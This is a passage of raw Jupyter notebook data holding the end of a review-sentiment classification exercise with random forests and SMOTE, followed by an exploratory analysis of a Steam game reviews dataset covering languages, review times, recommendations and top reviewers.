"# import packages\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\n\n# declare empty list 'corpus'\ncorpus=[]\n\n# for loop to fill in corpus\nfor i in range(0,2520):\n # retain alphabets\n review = re.sub('[^a-zA-Z]', ' ', df['verified_reviews'][i] )\n # convert to lower case\n review=review.lower()\n # tokenize\n review=review.split()\n # initialize stemmer object\n ps=PorterStemmer()\n # perform stemming\n review=[ps.stem(word) for word in review if not word in set(stopwords.words('english'))]\n # join elements of list\n review=' '.join(review)\n # add to 'corpus'\n corpus.append(review)\n ",
"_____no_output_____"
]
],
[
[
"### Model building\n\n- Now let's come to the actual task, using any classifier, predict the `feedback`. Use different techniques you have learned to imporove the performance of the model.\n- Try improving upon the `accuracy_score` ([Precision Score](https://scikit-learn.org/stable/modules/generated/sklearn.metrics.precision_score.html))",
"_____no_output_____"
]
],
[
[
"# import libraries\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\n\n# Instantiate count vectorizer\ncv = CountVectorizer(max_features=1500)\n\n# Independent variable\nX = cv.fit_transform(corpus).toarray()\n\n# dependent variable\ny = df['feedback']\n\n# Counts\ncount = y.value_counts()\nprint(count)\n\n# Split the dataset\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)",
"1 2308\n0 212\nName: feedback, dtype: int64\n"
],
[
"# import packages\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, f1_score\n\n# Instantiate calssifier\nrf = RandomForestClassifier(random_state=2)\n\n# fit model on training data\nrf.fit(X_train, y_train)\n\n# predict on test data\ny_pred = rf.predict(X_test)\n\n# calculate the accuracy score\nscore = accuracy_score(y_test, y_pred)\n\n# calculate the precision\nprecision = precision_score(y_test, y_pred)\n\n# display 'score' and 'precision'\nprint(score, precision)",
"0.9305555555555556 0.9363449691991786\n"
],
[
"# import packages\nfrom imblearn.over_sampling import SMOTE\n\n# Instantiate smote\nsmote = SMOTE(random_state=9)\n\n# fit_sample onm training data\nX_train, y_train = smote.fit_sample(X_train, y_train)\n\n# fit modelk on training data\nrf.fit(X_train, y_train)\n\n# predict on test data\ny_pred = rf.predict(X_test)\n\n# calculate the accuracy score\nscore = accuracy_score(y_test, y_pred)\n\n# calculate the precision\nprecision = precision_score(y_test, y_pred)\n\n# display precision and score\nprint(score, precision)",
"0.8888888888888888 0.9449339207048458\n"
]
],
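[
[
"# An additional technique that could be tried to improve the scores (a sketch, not part of\n# the pipeline above): TF-IDF features instead of raw counts, with the same classifier.\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ntfidf = TfidfVectorizer(max_features=1500)\nX_tfidf = tfidf.fit_transform(corpus).toarray()\nX_tr, X_te, y_tr, y_te = train_test_split(X_tfidf, y, test_size=0.20, random_state=0)\nrf_tfidf = RandomForestClassifier(random_state=2)\nrf_tfidf.fit(X_tr, y_tr)\ny_pred_tfidf = rf_tfidf.predict(X_te)\nprint(accuracy_score(y_te, y_pred_tfidf), precision_score(y_te, y_pred_tfidf))",
"_____no_output_____"
]
],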
[
[
"### Prediction on the test data and creating the sample submission file.\n\n- Load the test data and store the `Id` column in a separate variable.\n- Perform the same operations on the test data that you have performed on the train data.\n- Create the submission file as a `csv` file consisting of the `Id` column from the test data and your prediction as the second column.",
"_____no_output_____"
]
],
[
[
"# Code Starts here\n# Prediction on test data\n\n# Read the test data\ntest = pd.read_csv('test.csv')\n\n# Storing the id from the test file\nid_ = test['Id']\n\n# Apply the transformations on test\n# Converting date attribute from string to datetime.date datatype \ntest['date'] = pd.to_datetime(test['date'])\n\n# calculate the total length of word\ntest['length'] = test['verified_reviews'].apply(len)\n\n# declare empty list 'corpus'\ncorpus=[]\n\n# for loop to fill in corpus\nfor i in range(0,630):\n # retain alphabets\n review = re.sub('[^a-zA-Z]', ' ', test['verified_reviews'][i] )\n # convert to lower case\n review=review.lower()\n # tokenize\n review=review.split()\n # initialize stemmer object\n ps=PorterStemmer()\n # perform stemming\n review=[ps.stem(word) for word in review if not word in set(stopwords.words('english'))]\n # join elements of list\n review=' '.join(review)\n # add to 'corpus'\n corpus.append(review)\n \ntest = cv.transform(corpus).toarray()\n\n# predict on test data\ny_pred_test = rf.predict(test)\n\ny_pred_test = y_pred_test.flatten()\n\n# Create a sample submission file\nsample_submission = pd.DataFrame({'Id':id_,'feedback':y_pred_test})\nprint(sample_submission.head())\n\n# Convert the sample submission file into a csv file\nsample_submission.to_csv('sample_submission_test.csv',index=False)\n\n# Code ends here",
" Id feedback\n0 2887 1\n1 1934 1\n2 142 1\n3 1072 1\n4 2258 1\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb51081df4c2740c5aee626da09f61c33f8e64b6 | 893,783 | ipynb | Jupyter Notebook | main.ipynb | michele1783/ADM-HW2 | 2635ff78b9b2afa6f5c733a3c48ba5c2c909f681 | [
"MIT"
] | null | null | null | main.ipynb | michele1783/ADM-HW2 | 2635ff78b9b2afa6f5c733a3c48ba5c2c909f681 | [
"MIT"
] | null | null | null | main.ipynb | michele1783/ADM-HW2 | 2635ff78b9b2afa6f5c733a3c48ba5c2c909f681 | [
"MIT"
] | null | null | null | 266.086038 | 219,005 | 0.847246 | [
[
[
"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport seaborn as sns\nfrom datetime import datetime\nfrom functools import reduce\nfrom collections import Counter\nimport functions\nfrom scipy.stats import ks_2samp\nfrom scipy.stats import pearsonr\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\n\npd.options.mode.chained_assignment = None",
"_____no_output_____"
]
],
[
[
"# Load the dataset\nwe load our dataset and using the function **parsedate** we have changed the format of our timestamp",
"_____no_output_____"
]
],
[
[
"dataset = pd.read_csv('steam_reviews.csv',\n index_col=0,\n parse_dates=['timestamp_created', 'timestamp_updated', 'author.last_played'],\n date_parser=functions.parsedate)",
"C:\\Users\\Clara\\AppData\\Local\\Programs\\Python\\Python39\\lib\\site-packages\\numpy\\lib\\arraysetops.py:580: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison\n mask |= (ar1 == a)\n"
],
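[
"# For reference, a plausible sketch of what functions.parsedate might do (an assumption --\n# the real helper lives in the separate functions.py module, which is not shown here):\n# turn a Unix epoch value into a datetime object.\ndef parsedate_sketch(ts):\n    return datetime.fromtimestamp(int(ts))",
"_____no_output_____"
],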
[
"dataset.head(20)",
"_____no_output_____"
],
[
"dataset.columns",
"_____no_output_____"
],
[
"dataset.shape",
"_____no_output_____"
],
[
"dataset.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 21747371 entries, 0 to 21747375\nData columns (total 22 columns):\n # Column Dtype \n--- ------ ----- \n 0 app_id int64 \n 1 app_name object \n 2 review_id int64 \n 3 language object \n 4 review object \n 5 timestamp_created datetime64[ns]\n 6 timestamp_updated datetime64[ns]\n 7 recommended bool \n 8 votes_helpful int64 \n 9 votes_funny int64 \n 10 weighted_vote_score float64 \n 11 comment_count int64 \n 12 steam_purchase bool \n 13 received_for_free bool \n 14 written_during_early_access bool \n 15 author.steamid int64 \n 16 author.num_games_owned int64 \n 17 author.num_reviews int64 \n 18 author.playtime_forever float64 \n 19 author.playtime_last_two_weeks float64 \n 20 author.playtime_at_review float64 \n 21 author.last_played datetime64[ns]\ndtypes: bool(4), datetime64[ns](3), float64(4), int64(8), object(3)\nmemory usage: 3.2+ GB\n"
]
],
[
[
"# RQ1",
"_____no_output_____"
],
[
"### Exploratory Data Analysis (EDA)\n\nTo try to better understand our dataset we have made a bunch of plots and tables in which we have tried to catch some information about these reviews received for the applications in Steam.",
"_____no_output_____"
]
],
[
[
"dataset.describe()",
"_____no_output_____"
]
],
[
[
"#### Application more reviewed: \nTo start our analysis we have made a pie chart about applications more reviewed. In particular we have decided to pick the first thirty games more reviewed and understand how the number of rewiews is splitted between them. Indeed the percentage written in the slices of the pie plot is referred not to the total number of reviews but the to the sum of reviews written for these thirty more popular games. The choice of thirty is due to make cleaner the plot and because we are interested only in the more popular games. The most talked-about.",
"_____no_output_____"
]
],
[
[
"a = pd.Series(dataset.groupby(\"app_name\").app_id.count().sort_values(ascending=False).head(30))\nplt.rcParams['figure.figsize'] = (10, 10)\nplt.pie(a,\n labels = a.index,\n explode = [0.1 for value in range(0, a.index.nunique())],\n shadow = True, autopct = '%.1f%%')\nplt.title('Application name', fontsize = 20)\nplt.axis('off')\nplt.show()",
"_____no_output_____"
]
],
[
[
"#### Correlation matrix:\nThen we have tried to make a correlation matrix to understand if there are some variables correlated between them ",
"_____no_output_____"
]
],
[
[
"fig, ax = plt.subplots(figsize=(13,13)) \nsns.heatmap(dataset.corr(), cbar=True, annot = True, cmap='BrBG', linewidths=.3,fmt='.1g')",
"_____no_output_____"
]
],
[
[
"We have noticed that there was not any particular correlation between columns except for the ones related to time played by the player therefore we have decided to see in depth these correlations to have clearer information about them. ",
"_____no_output_____"
]
],
[
[
"df = pd.DataFrame(dataset,columns=['author.playtime_forever','author.playtime_last_two_weeks',\\\n 'author.playtime_at_review'])\ncorrMatrix = df.corr()\nsns.heatmap(corrMatrix, annot=True)\nplt.show()\n",
"_____no_output_____"
]
],
[
[
"#### Time and Language:\nAt this point we want to extract some information about the language of the reviews and time when they were written. We have divided the day in three parts: morning (8am-2pm), afternoon (2pm-10pm) and night (10pm-8am). \nSo for each part of the day we have grouped the reviews by language, counted them and picked the ten languages more popular.\n\nIn this way in our final barplot for each popular language we have the number of reviews written in each part of the day. We have also made a table to explain better the number obtained. ",
"_____no_output_____"
]
],
[
[
"arr_1 = dataset['timestamp_created'].dt.time",
"_____no_output_____"
],
[
"time_1 = [datetime.strptime('08:00:00', '%H:%M:%S').time(),\n datetime.strptime('13:59:59', '%H:%M:%S').time()]\nindex_1 = [x for x in arr_1.index if (time_1[0] <= arr_1[x] <= time_1[1])]",
"_____no_output_____"
],
[
"time_2 = [datetime.strptime('14:00:00', '%H:%M:%S').time(),\n datetime.strptime('21:59:59', '%H:%M:%S').time()]\nindex_2 = [x for x in arr_1.index if (time_2[0] <= arr_1[x] <= time_2[1])]",
"_____no_output_____"
],
[
"time_3 = [datetime.strptime('22:00:00', '%H:%M:%S').time(),\n datetime.strptime('23:59:59', '%H:%M:%S').time(),\n datetime.strptime('00:00:00', '%H:%M:%S').time(),\n datetime.strptime('07:59:59', '%H:%M:%S').time()]\nindex_3 = [x for x in arr_1.index\n if ((time_3[0] <= arr_1[x] <= time_3[1]) or\n (time_3[2] <= arr_1[x] <= time_3[3]))]",
"_____no_output_____"
],
[
"# counting occurrences in the languages\nmat1 = Counter((dataset['language'][index_1]).tolist())\npom1 = Counter((dataset['language'][index_2]).tolist())\nnot1 = Counter((dataset['language'][index_3]).tolist())",
"_____no_output_____"
],
[
"# sorting the occurrences\nmat2 = {k: v for k, v in sorted(mat1.items(), key=lambda item: item[1], reverse=True)}\npom2 = {k: v for k, v in sorted(pom1.items(), key=lambda item: item[1], reverse=True)}\nnot2 = {k: v for k, v in sorted(not1.items(), key=lambda item: item[1], reverse=True)}",
"_____no_output_____"
],
[
"# taking only the first 10 languages, that happens to be the same for every time slot\nmattina = list(mat2.items())[:10]\npomeriggio = list(pom2.items())[:10]\nnotte = list(not2.items())[:10]",
"_____no_output_____"
],
[
"# creating an empty dataframe with timeslots as cols and languages as indexes\ndf = pd.DataFrame(index=list(mat2.keys())[:10], columns=['8am-2pm', '2pm-10pm', '10pm-8am'])",
"_____no_output_____"
],
[
"# adding the values in the dataframe\nfor (couple1, couple2, couple3) in zip(mattina, pomeriggio, notte):\n df['8am-2pm'][couple1[0]] = couple1[1]\n df['2pm-10pm'][couple2[0]] = couple2[1]\n df['10pm-8am'][couple3[0]] = couple3[1]",
"_____no_output_____"
],
[
"df.index.name = 'language'\ndf",
"_____no_output_____"
],
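[
"# An equivalent, vectorized way to build the same table (a sketch on the same dataset):\n# bucket the creation hour into the three time slots and cross-tabulate with the language.\nhours = dataset['timestamp_created'].dt.hour\nslots = pd.Series(np.select([hours.between(8, 13), hours.between(14, 21)], ['8am-2pm', '2pm-10pm'], '10pm-8am'), index=dataset.index)\ndf_vec = pd.crosstab(dataset['language'], slots)\ndf_vec.loc[df.index]  # restrict to the same top-10 languages as the table above",
"_____no_output_____"
],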
[
"ax = df.plot(y=[\"8am-2pm\", \"2pm-10pm\", \"10pm-8am\"], kind=\"bar\")\nax.set_yscale('log')\nax.set_xlabel('languages')\nax.set_ylabel(\"number reviews\")",
"_____no_output_____"
]
],
[
[
"In this stacked barplot we can see that the majority of the reviews are written during the afternoon while during the night fewer people usually write on Steam. The language more used as expected is English",
"_____no_output_____"
],
[
"#### Viral Comments:\nIn this table we have wanted to look at the ten reviews which have received more comments because we have thought that it could be interesting look at them to understand which comments are popular on Steam. ",
"_____no_output_____"
]
],
[
[
"dataset_7 = dataset.sort_values(by=['comment_count'], ascending = False)\ndataset_7 = dataset_7.reset_index()",
"_____no_output_____"
],
[
"dataset_7[[\"author.steamid\", \"language\", \"app_name\", \"review\", \"comment_count\"]].head(10)",
"_____no_output_____"
]
],
[
[
"Unfortunately the majority of them are written not in english!",
"_____no_output_____"
],
[
"#### Games more played:\nIn our dataset there is a column in which is stored the time played by that player to that particular game. So we have decided to explore what are the games more played in terms of hours. We have decided to pick the top 20 games because we have thought that 20 is a good trade-off between a clear plot and a meaningful number of games. ",
"_____no_output_____"
]
],
[
[
"#dataset_8 = dataset_8[[\"author.steamid\", \"author.playtime_forever\",\"app_name\"]]\ndataset_8 = pd.Series(dataset.groupby(\"app_name\")[\"author.playtime_forever\"].sum().sort_values(ascending=False))\nore_di_gioco = dataset_8.values\ngiochi = dataset_8.index",
"_____no_output_____"
],
[
"plt.figure(figsize = ((15, 8)))\nsns.barplot(x = ore_di_gioco[:20], \n y = giochi[:20], orient = 'h')\nplt.title('TOP 20 games more played in terms of hours', size = 20)\nplt.ylabel('Games', size = 14, style = 'italic')\nplt.xlabel('Number of hours', size = 14, style = 'italic')\n#plt.xscale('log')\nplt.xticks(np.arange(1000000000,60000000000,2000000000)) \nplt.show()",
"_____no_output_____"
]
],
[
[
"In this barplot we have found some confirms: the games more played are also often the games more reviewed that were appeared in the pie chart.",
"_____no_output_____"
],
[
"#### Active players:\nTo conclude this first analysis we have tried to understand what are the players more useful for Steam: we have selected the ten authors that have written the most number of helpful and funny reviews. ",
"_____no_output_____"
]
],
[
[
"dataset_9 = pd.Series(dataset[(dataset.votes_helpful > 0)].groupby(\"author.steamid\").votes_helpful.count().sort_values(ascending=False))\n\ndataset_10 = pd.Series(dataset[(dataset.votes_funny > 0)].groupby(\"author.steamid\").votes_funny.count().sort_values(ascending=False))",
"_____no_output_____"
],
[
"pd.concat([dataset_9[:11], dataset_10[:11]], axis=1).reset_index().fillna(0).sort_values(by=['votes_helpful'],ascending=False).reset_index(drop = True)",
"_____no_output_____"
]
],
[
[
"It's interesting to see that the authors who have written some funny reviews have also written helpful reviews. ",
"_____no_output_____"
],
[
"#### Languages and subplots",
"_____no_output_____"
]
],
[
[
"print(\"The total number of languages used to write reviews is \",'\\033[1m' +str(len(dataset[\"language\"].unique())) +'\\033[0m')",
"The total number of languages used to write reviews is \u001b[1m28\u001b[0m\n"
]
],
[
[
"Making a subplot we have been able to visualize all the present languages in the dataset and counting the number of reviews. The two subplots have different measure in y-scales!",
"_____no_output_____"
]
],
[
[
"fig=plt.figure(figsize=(25,18))\nax1=fig.add_subplot(2,1,1)\ndataset['language'].value_counts().head(10).plot.bar(figsize = (18, 10),title='Top 10 Languages',xlabel='Language',ylabel='Number of Reviews', ax = ax1,rot=0, logy = True, color = \"orange\")\nax2=fig.add_subplot(2,1,2)\ndataset['language'].value_counts().iloc[-18:].plot.bar(figsize = (18, 10),title='Other 18 Languages',xlabel='Language',ylabel='Number of Reviews', ax = ax2,rot=0, color = \"orchid\")\nfig.tight_layout();\n\n#dataset['language'].value_counts().plot.bar(figsize = (18, 7),title='Top Languages',xlabel='Language',ylabel='Number of Reviews', ax = ax1)",
"_____no_output_____"
]
],
[
[
"# RQ2",
"_____no_output_____"
],
[
"### Plot the number of reviews for each application in descending order.",
"_____no_output_____"
],
[
"We have decided to make a barplot in which we have counted the number of reviews for the first 50 applications. We have decided 50 because it have seemed to us a good tradeoff to have a clean representation a pick the more reviewed games",
"_____no_output_____"
]
],
[
[
"number_review = dataset.groupby(\"app_name\").review_id.count().sort_values(ascending=False)\nnumber_review[0:50].plot.bar(figsize = (18, 7), title=' Number of review', xlabel='Name of application',\nylabel='Number of review', color = \"coral\", logy = True)\nplt.show()\n",
"_____no_output_____"
],
[
"# for a visual table to have an idea of how many reviews for the first 50 apps\nnumber_review.reset_index().head(50)",
"_____no_output_____"
]
],
[
[
"### What applications have the best Weighted Vote Score?",
"_____no_output_____"
],
[
"Each review has a **Weighted Vote Score** that represents the helpfuness score of that review. To extract the weighted vote score for each game we have computed the mean between all the vote for each application. In this way we have an idea about what applications have received the most helpfulness reviews. Then we have decided to select only average votes above 0.3 because we have considered it a good threshold for the best votes. ",
"_____no_output_____"
]
],
[
[
"medie = pd.DataFrame(dataset.groupby(\"app_name\").weighted_vote_score.mean().sort_values(ascending=False))\nmedie = medie[medie.values > 0.3]\nmedie",
"_____no_output_____"
]
],
[
[
"### Which applications have the most and the least recommendations",
"_____no_output_____"
],
[
"In this point, we thought that for most and least recommended apps, the percentage values where the ones to be aware of, meaning that an app was the most recommended if it has the higher percentage value of the most recommended reviews",
"_____no_output_____"
]
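,
[
"The same percentage can also be obtained in a more compact way, because the mean of a boolean column is exactly the fraction of `True` values. This is only a hedged sketch of an equivalent computation (same `dataset` as above), not the code used for the tables below.\n\n```python\n# hedged sketch: percentage of positive (recommended) reviews per application\nperc_rec = dataset.groupby('app_name')['recommended'].mean().mul(100).sort_values(ascending=False)\n```",
"_____no_output_____"
]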
],
[
[
"#Most\n# recommended. group_by app_name. count all recommended,\n# count True recommended and False recommended in separate cols, and percentage of these.\n# taking only the useful cols\nnew_data = dataset[['app_name', 'recommended']]\n# count_rec col counts all recommended respectively False and True of an application\nnew_data['count_rec'] = new_data.groupby(['app_name', 'recommended'], sort=False)['recommended'].transform('count')",
"_____no_output_____"
],
[
"# all_rec col counts all recommedations, False and True together\nnew_data['all_rec'] = new_data.groupby(\"app_name\", sort=False)['count_rec'].transform('count')",
"_____no_output_____"
],
[
"# final dataframe which contains only the True recommendations\n# this means that we can calculate the most and the least recommended apps\nfinal = new_data[(new_data['recommended']==True)].drop_duplicates()",
"_____no_output_____"
],
[
"# perc_rec calculates the percentage recommendation\nfinal['perc_rec'] = (final['count_rec']/final['all_rec'])*100\n# drop not useful cols\nfinal.drop(['recommended', 'count_rec'], axis=1, inplace=True)",
"_____no_output_____"
],
[
"# most recommended, first 50\nfinal.sort_values(by='perc_rec', ascending=False).reset_index(drop=True).head(50)",
"_____no_output_____"
]
],
[
[
"We can see that the most recommended apps are not the one with the higher reviews",
"_____no_output_____"
]
],
[
[
"# least recommended, first 50\nfinal.sort_values(by='perc_rec', ascending=True).reset_index(drop=True).head(50)",
"_____no_output_____"
]
],
[
[
"### How many of these applications were purchased, and how many were given for free?",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
],
[
[
"# steam_purchase\n# taking only the useful cols\nnew_data1 = dataset[['app_name', 'steam_purchase']]",
"_____no_output_____"
],
[
"# same modus operandi of counting recommendation\nnew_data1['count_pur'] = new_data1.groupby(['app_name', 'steam_purchase'], sort=False)['steam_purchase'].transform('count')",
"_____no_output_____"
],
[
"# taking only the ones purchased\nfinal1 = new_data1[(new_data1['steam_purchase']==True)].drop_duplicates()",
"_____no_output_____"
],
[
"# drop not useful col\nfinal1.drop(['steam_purchase'], axis=1, inplace=True)",
"_____no_output_____"
],
[
"# received_for_free\n# taking only the useful cols\nnew_data2 = dataset[['app_name', 'received_for_free']]",
"_____no_output_____"
],
[
"# same modus operandi\nnew_data2['count_free'] = new_data2.groupby(['app_name', 'received_for_free'], sort=False)['received_for_free'].transform('count')",
"_____no_output_____"
],
[
"# take only the ones received_for_free\nfinal2 = new_data2[(new_data2['received_for_free']==True)].drop_duplicates()",
"_____no_output_____"
],
[
"# drop not useful col\nfinal2.drop(['received_for_free'], axis=1, inplace=True)",
"_____no_output_____"
],
[
"# now it's time to calculate the final result, by doing a merge of the final dataframes\ndfs = [final, final1, final2]\nfinal_df = reduce(lambda left,right: pd.merge(left,right,on=['app_name'],\n how='outer'), dfs)",
"_____no_output_____"
],
[
"# taking the first 40 apps that are most recommended and displaying how many times were\n# purchased and how many times were received for free\nfinal_df.sort_values(by='perc_rec', ascending=False).head(40)",
"_____no_output_____"
],
[
"# least recommended\nfinal_df.sort_values(by='perc_rec').head(40)",
"_____no_output_____"
]
],
[
[
"# RQ 3",
"_____no_output_____"
],
[
"### What is the most common time that authors review an application? For example, authors usually write a review at 17:44.",
"_____no_output_____"
],
[
"First of all, we take only the `timestamp_created` col and we convert in `string` the time values. Next, with a simple dictionary and a `for` cycle, we count the occurrences of every single time (HH:MM) and at the end we return only the most common time.",
"_____no_output_____"
]
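,
[
"The same answer can also be obtained with a short pandas chain. The snippet below is only a hedged alternative sketch (it assumes the same `dataset` as above), not the code used for the result.\n\n```python\n# hedged sketch: most common HH:MM among review creation times\nmost_common_time = (dataset['timestamp_created']\n                    .dt.strftime('%H:%M')\n                    .value_counts()\n                    .idxmax())\n```",
"_____no_output_____"
]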
],
[
[
"# first point\n# taking only the timestamp_created col\ntimestamp_col = np.array(dataset[\"timestamp_created\"].dt.time.astype('str'))",
"_____no_output_____"
],
[
"dict_time = {}\nfor time in timestamp_col:\n # taking only hour and minute\n new_time = time[:5]\n if new_time not in list(dict_time.keys()):\n dict_time[new_time] = 1\n else:\n dict_time[new_time] += 1",
"_____no_output_____"
],
[
"# sorting the dictionary in descending order\ndict_time_sorted = {k: v for k, v in sorted(dict_time.items(), key=lambda item: item[1], reverse=True)}",
"_____no_output_____"
],
[
"# returning the most common time (without seconds)\nnext(iter(dict_time_sorted))",
"_____no_output_____"
]
],
[
[
"### Create a function that receives as a parameter a list of time intervals and returns the plot the number of reviews for each of the intervals.\n\nUsing the function **orario** we can extract for a given list of time interval the number of reviews written in each time interval \n",
"_____no_output_____"
],
[
"### Use the function that you created in the previous literal to plot the number of reviews between the following time intervals:",
"_____no_output_____"
]
],
[
[
"intervalli = ['06:00:00', '10:59:59', '11:00:00', '13:59:59', '14:00:00', '16:59:59',\n '17:00:00', '19:59:59', '20:00:00', '23:59:59', '00:00:00', '02:59:59', '03:00:00',\n '05:59:59']",
"_____no_output_____"
],
[
"functions.orario(intervalli)",
"C:\\Users\\Clara\\AppData\\Local\\Programs\\Python\\Python39\\lib\\site-packages\\numpy\\lib\\arraysetops.py:580: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison\n mask |= (ar1 == a)\n"
]
],
[
[
"On the x-axis for each bar is indicated the starting point of the time interval. We have observed that fewer people have written reviews during the night while the majority of people have written their reviews in the first hours of the morning and in the dinner hours",
"_____no_output_____"
],
[
"# RQ4",
"_____no_output_____"
],
[
"### What are the top 3 languages used to review applications?",
"_____no_output_____"
]
],
[
[
"top_languages = pd.DataFrame(dataset.groupby(\"language\").review_id.count().sort_values(ascending=False).head(3))\ntop_languages",
"_____no_output_____"
]
],
[
[
"As expected the majority of the reviews are written in english, chinese and russian!",
"_____no_output_____"
]
],
[
[
"top_languages = list(top_languages.index)\ntop_languages",
"_____no_output_____"
]
],
[
[
"### Create a function that receives as parameters both the name of a data set and a list of languages’ names and returns a data frame filtered only with the reviews written in the provided languages.",
"_____no_output_____"
],
[
"There we have used the function **get_reviews_by_languages** to accomplish a dataframe where there are only reviews written in the top 3 languages",
"_____no_output_____"
]
],
[
[
"dataset_filter = functions.get_reviews_by_languages(dataset, top_languages)",
"_____no_output_____"
]
],
[
[
"### Use the function created in the previous literal to find what percentage of these reviews (associated with the top 3 languages) were voted as funny?",
"_____no_output_____"
],
[
"For this request we have used the new filtered dataset and for each language we have selected the reviews that have received at least one funny vote and then we have computed the ratio between them and all the reviews written in that language.\n\nTo compute this percentage we have used **dataset_filter** that is the new dataframe obtained using the previous function **filtro**",
"_____no_output_____"
]
],
[
[
"numeratore_1 = []\ndenominatore_1 = []\nrapporto_1 = []\nfor i in range(len(top_languages)):\n numeratore_1.append(dataset_filter.loc[(dataset_filter.votes_funny != 0) & (dataset_filter.language == top_languages[i])].votes_funny.count())\n denominatore_1.append(dataset_filter[dataset_filter.language == top_languages[i]].votes_funny.count())\n rapporto_1.append(round((numeratore_1[i]/denominatore_1[i])*100, 2))\n print(\"The percentage of reviews written in \" + '\\033[1m' + top_languages[i] +'\\033[0m' +\n \" that has received at least a funny vote is \" +\n '\\033[1m' + str(rapporto_1[i]) + \"%\" + '\\033[0m')\n",
"The percentage of reviews written in \u001b[1menglish\u001b[0m that has received at least a funny vote is \u001b[1m11.27%\u001b[0m\nThe percentage of reviews written in \u001b[1mschinese\u001b[0m that has received at least a funny vote is \u001b[1m11.82%\u001b[0m\nThe percentage of reviews written in \u001b[1mrussian\u001b[0m that has received at least a funny vote is \u001b[1m16.68%\u001b[0m\n"
]
],
[
[
"At this point we have also wanted to compute the percentage of reviews that have received at least a funny vote among all these three languages. ",
"_____no_output_____"
]
],
[
[
"# same as above\nprint(\"The percentage of reviews written in one of the top 3 language that has received at \"\n \"least a funny vote is \" + '\\033[1m' + str(round((sum(numeratore_1)/sum(denominatore_1))*100, 2)) + \"%\" + '\\033[0m')",
"The percentage of reviews written in one of the top 3 language that has received at least a funny vote is \u001b[1m12.21%\u001b[0m\n"
]
],
[
[
"### Use the function created in the literal “a” to find what percentage of these reviews (associated with the top 3 languages) were voted as helpful?",
"_____no_output_____"
],
[
"For this request we have used the new filtered dataset and for each language we have selected the reviews that have received at least one helpful vote and then we have computed the ratio between them and all the reviews written in that language.\n\nTo compute this percentage we have used **dataset_filter** that is the new dataframe obtained using the previous function **filtro**",
"_____no_output_____"
]
],
[
[
"numeratore_2 = []\ndenominatore_2 = []\nrapporto_2 = []\nfor i in range(len(top_languages)):\n numeratore_2.append(dataset_filter.loc[(dataset_filter.votes_helpful != 0) & (dataset_filter.language == top_languages[i])].votes_helpful.count())\n denominatore_2.append(dataset_filter[dataset_filter.language == top_languages[i]].votes_helpful.count())\n rapporto_2.append(round((numeratore_2[i]/denominatore_2[i])*100, 2))\n print(\"The percentage of reviews written in \" + '\\033[1m' + top_languages[i] + '\\033[0m' +\n \" that has received at least a helpful vote is \" +\n '\\033[1m' + str(rapporto_2[i]) + \"%\" + '\\033[0m')",
"The percentage of reviews written in \u001b[1menglish\u001b[0m that has received at least a helpful vote is \u001b[1m29.2%\u001b[0m\nThe percentage of reviews written in \u001b[1mschinese\u001b[0m that has received at least a helpful vote is \u001b[1m25.1%\u001b[0m\nThe percentage of reviews written in \u001b[1mrussian\u001b[0m that has received at least a helpful vote is \u001b[1m35.5%\u001b[0m\n"
]
],
[
[
"At this point we have also wanted to compute the percentage of reviews that have received at least a helpful vote among all these three languages.",
"_____no_output_____"
]
],
[
[
"# same as above\nprint(\"The percentage of reviews written in one of the top 3 language that has received at \"\n \"least a helpful vote is \" + '\\033[1m' + str(round((sum(numeratore_2)/sum(denominatore_2))*100, 2)) + \"%\" + '\\033[0m')",
"The percentage of reviews written in one of the top 3 language that has received at least a helpful vote is \u001b[1m29.16%\u001b[0m\n"
]
],
[
[
"# RQ5",
"_____no_output_____"
],
[
"### Plot the top 10 most popular reviewers and the number of reviews.",
"_____no_output_____"
]
],
[
[
"num_reviewers = dataset['author.steamid'].value_counts().head(10)",
"_____no_output_____"
],
[
"num_reviewers.plot(kind='bar',\n xlabel='TOP 10 reviewers',\n ylabel='number of reviews')",
"_____no_output_____"
]
],
[
[
"### What applications did the most popular author review?\n",
"_____no_output_____"
],
[
"At first, we took the previous result of the most popular author to leave only the rows of the reviews written by him/her, and then we returned all the applications reviewed by this author.",
"_____no_output_____"
]
],
[
[
"num_rev = pd.DataFrame({'reviewers':num_reviewers.index, 'num_reviews':num_reviewers.values})",
"_____no_output_____"
],
[
"pop_auth = num_rev['reviewers'][0]",
"_____no_output_____"
],
[
"apps_rev = dataset[dataset['author.steamid'] == pop_auth].app_name",
"_____no_output_____"
],
[
"app_name_rev = list(apps_rev.values)",
"_____no_output_____"
],
[
"app_name_rev = [el for el, count in Counter(app_name_rev).items()]",
"_____no_output_____"
],
[
"print(app_name_rev)",
